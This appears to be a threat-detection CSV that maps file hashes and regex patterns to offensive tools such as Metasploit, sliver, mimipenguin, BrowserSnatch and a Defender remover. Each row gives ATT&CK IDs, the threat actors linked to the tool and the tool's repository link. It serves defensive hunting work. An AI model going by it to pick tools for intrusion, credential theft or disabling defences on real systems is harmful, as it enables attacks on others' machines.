"*7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3*",".{0,1000}7d2a12270debccf539db741714c724d3bf88d9814e3056533ba2c712c71b0ef3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","29663"
"*7d2a1f11107cf703d1bc2eb6cf4e2627d1eec923852b4a3230b7e79ca2542587*",".{0,1000}7d2a1f11107cf703d1bc2eb6cf4e2627d1eec923852b4a3230b7e79ca2542587.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","29664"
"*7d2dfbf053a420ad3857171642cbec5738196a0ead931f93737d16e14b7faec4*",".{0,1000}7d2dfbf053a420ad3857171642cbec5738196a0ead931f93737d16e14b7faec4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","29665"
"*7d3429af6ef46337888e2671bdae37cd6270a40ea02fedd0999530cecf1fc67d*",".{0,1000}7d3429af6ef46337888e2671bdae37cd6270a40ea02fedd0999530cecf1fc67d.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","29666"
"*7d3a5a08c0a08593371527c2e26ebb05907adf47883de46e21bb8118214d9399*",".{0,1000}7d3a5a08c0a08593371527c2e26ebb05907adf47883de46e21bb8118214d9399.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29668"
"*7D430DB8006F611817143F28D8141BBDB3291348455FB0C53E9EEBE59E890695*",".{0,1000}7D430DB8006F611817143F28D8141BBDB3291348455FB0C53E9EEBE59E890695.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","29669"
"*7d46566153850560ca31a36edd46a33728d6c2422f9a9fec8efece7f74642f0b*",".{0,1000}7d46566153850560ca31a36edd46a33728d6c2422f9a9fec8efece7f74642f0b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29670"
"*7d4d612275a6f4c3d1b0d23c3ae19cf39fcdd729f3f899f3df44b619bea7e17b*",".{0,1000}7d4d612275a6f4c3d1b0d23c3ae19cf39fcdd729f3f899f3df44b619bea7e17b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","29672"
"*7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe*",".{0,1000}7d573a4e6b5f9864b7de3e769d2154d8a38119656b0900ab6e93f44f46ad2fbe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29673"
"*7d5785c1760909ac5dc68ce57aabcf86af2444ae42e19b568eb1e32d8a414913*",".{0,1000}7d5785c1760909ac5dc68ce57aabcf86af2444ae42e19b568eb1e32d8a414913.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","29674"
"*7d621fe424daf7ca2a90cc1167ae8a9fc8eca96c82821acf6a2fa3fe7683603c*",".{0,1000}7d621fe424daf7ca2a90cc1167ae8a9fc8eca96c82821acf6a2fa3fe7683603c.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","29677"
"*7d65bb1ac457f40d6b4fa1b6ccbcba7e153940568b50d7119fc3135cdb6ecbab*",".{0,1000}7d65bb1ac457f40d6b4fa1b6ccbcba7e153940568b50d7119fc3135cdb6ecbab.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29678"
"*7d6717ec16ee8a51b0fc81d5c762f8735211d13c8be9476c2e75c3f5ae42a478*",".{0,1000}7d6717ec16ee8a51b0fc81d5c762f8735211d13c8be9476c2e75c3f5ae42a478.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","29679"
"*7d675410e845e1f645226deca1725ff724df5a61d3235b3e3af3d0b1d4090cf8*",".{0,1000}7d675410e845e1f645226deca1725ff724df5a61d3235b3e3af3d0b1d4090cf8.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","29680"
"*7d67b3f5a0eae10e93d144bd9dba056c77d14b3246aa86ca20d8de02b3f1c674*",".{0,1000}7d67b3f5a0eae10e93d144bd9dba056c77d14b3246aa86ca20d8de02b3f1c674.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","29681"
"*7d682fa901e31cc0a7196c4588f434ab88e0dc26c37dfde27f6b31849abc3283*",".{0,1000}7d682fa901e31cc0a7196c4588f434ab88e0dc26c37dfde27f6b31849abc3283.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29682"
"*7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c*",".{0,1000}7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29683"
"*7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c*",".{0,1000}7d6c67ce067fc1f459e617e2cb6d891e74ccdf3b4630fd64cb824b230a74dc8c.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","29684"
"*7d87848076e10ed06f0a178bfae29e07d10c2d8831c0b4a5c6865b950fb2635c*",".{0,1000}7d87848076e10ed06f0a178bfae29e07d10c2d8831c0b4a5c6865b950fb2635c.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","#filehash","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","29688"
"*7d90e68af91d2670512ca9db8d6c6d1055007918ca637b9ae54f39f0380ad2e3*",".{0,1000}7d90e68af91d2670512ca9db8d6c6d1055007918ca637b9ae54f39f0380ad2e3.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","29689"
"*7d98c9c00f9813e45f807b3d5779c10e38b4191ad8e7c25669c0c7a3e3ce3cda*",".{0,1000}7d98c9c00f9813e45f807b3d5779c10e38b4191ad8e7c25669c0c7a3e3ce3cda.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29692"
"*7d9c98819d1866c8ecba316b650dab266a1d5bcc48bb7eba0ef147ad487dfff2*",".{0,1000}7d9c98819d1866c8ecba316b650dab266a1d5bcc48bb7eba0ef147ad487dfff2.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","29693"
"*7da1b05ebb0a51e4160ea04db4f70b6e710c14546d5a13169942e4d686bdc477*",".{0,1000}7da1b05ebb0a51e4160ea04db4f70b6e710c14546d5a13169942e4d686bdc477.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","29694"
"*7da296b4276a84298ef0a70aa516dc49dad526cecf21094d5b2aa42651a25c86*",".{0,1000}7da296b4276a84298ef0a70aa516dc49dad526cecf21094d5b2aa42651a25c86.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29695"
"*7da421d00cd50570a79a82803c170d043fa3b2253ae2f0697e103072c34d39f1*",".{0,1000}7da421d00cd50570a79a82803c170d043fa3b2253ae2f0697e103072c34d39f1.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29696"
"*7da54ac68e35d2604980ef414a6ec8b696bf6ec5df2b32ad7596bee48db883c6*",".{0,1000}7da54ac68e35d2604980ef414a6ec8b696bf6ec5df2b32ad7596bee48db883c6.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","29697"
"*7DB2951389A8839D1CC00088A7A2C2432B396D742CABEEC317C02C7B8564250D*",".{0,1000}7DB2951389A8839D1CC00088A7A2C2432B396D742CABEEC317C02C7B8564250D.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","29698"
"*7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061*",".{0,1000}7db43d94124a60b25347cddbba96109399cba1df3d4b7231d032888e4c2ae061.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29699"
"*7dbc46ea673ab508a7b9121b0a49d29470a8fc01669105173fd2a52f88dd946a*",".{0,1000}7dbc46ea673ab508a7b9121b0a49d29470a8fc01669105173fd2a52f88dd946a.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","29701"
"*7dc0339f87f1d3e213a24cecd058ca8abbf7dd271eccf5b168529d30b9d708ba*",".{0,1000}7dc0339f87f1d3e213a24cecd058ca8abbf7dd271eccf5b168529d30b9d708ba.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29702"
"*7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b*",".{0,1000}7dc9dc828a34eddb7080c9f01c7d6a7ceb6d4f4c876eb48191e741a6af21aa2b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29705"
"*7dd6329b978fd795c42131075b4fc6eaa16b759594c8e80402e7d8221d6c639e*",".{0,1000}7dd6329b978fd795c42131075b4fc6eaa16b759594c8e80402e7d8221d6c639e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29706"
"*7de6e20c24d452409937f4869770848445952afa1ff26288dfb558d8edc64def*",".{0,1000}7de6e20c24d452409937f4869770848445952afa1ff26288dfb558d8edc64def.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","29709"
"*7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb*",".{0,1000}7de9505c6a9be2ff8b308140d28e9318a6045529f70a48bd7ce4115d263988cb.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","29710"
"*7dea0ea9ae8fe294dbe38f27a1e718298ce411f3bcc86084741b8484276ea8a6*",".{0,1000}7dea0ea9ae8fe294dbe38f27a1e718298ce411f3bcc86084741b8484276ea8a6.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","29711"
"*7decdf6084875e659632431939e99c23db088fb991d5102a7646f27f27461ce4*",".{0,1000}7decdf6084875e659632431939e99c23db088fb991d5102a7646f27f27461ce4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29712"
"*7deeafff78ee13e8c4a8073ab7a66265d54b40abeb2bc0691e905176df785401*",".{0,1000}7deeafff78ee13e8c4a8073ab7a66265d54b40abeb2bc0691e905176df785401.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","29713"
"*7df4d9b5a4c5a9f74497a4493fa1c4fe28d3e8f4436fcea903bd2b63e006951b*",".{0,1000}7df4d9b5a4c5a9f74497a4493fa1c4fe28d3e8f4436fcea903bd2b63e006951b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29714"
"*7dfb0ece83deed38190bb57a9aab44a101203fa7e0b3e633e7c7231173a43fd1*",".{0,1000}7dfb0ece83deed38190bb57a9aab44a101203fa7e0b3e633e7c7231173a43fd1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29717"
"*7dfb613a59e09dd5f01a83c3980fc661ccfc2875c2091165c54e5989954907cc*",".{0,1000}7dfb613a59e09dd5f01a83c3980fc661ccfc2875c2091165c54e5989954907cc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29718"
"*7e1537d35b2a1d993bda4eb5531d479f19b9381db45fd16a9163703ae7602f44*",".{0,1000}7e1537d35b2a1d993bda4eb5531d479f19b9381db45fd16a9163703ae7602f44.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","29722"
"*7e158727df39c819d0b51228683ec4d1f1e9a949da480d6852445fa968814f46*",".{0,1000}7e158727df39c819d0b51228683ec4d1f1e9a949da480d6852445fa968814f46.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","29724"
"*7e1631ef7fe36cd300de646c9a3f6d55d162b28f8909adda2a9ca7443d11257b*",".{0,1000}7e1631ef7fe36cd300de646c9a3f6d55d162b28f8909adda2a9ca7443d11257b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29725"
"*7E1BCC8E-F61C-4728-BB8A-28FB42928256*",".{0,1000}7E1BCC8E\-F61C\-4728\-BB8A\-28FB42928256.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#GUIDproject","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","29726"
"*7e21c5b9cf9cb3cc0b3c6909fdf3a7820c6feaa45e86722ed4e7a43d39aee819*",".{0,1000}7e21c5b9cf9cb3cc0b3c6909fdf3a7820c6feaa45e86722ed4e7a43d39aee819.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#filehash","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","29728"
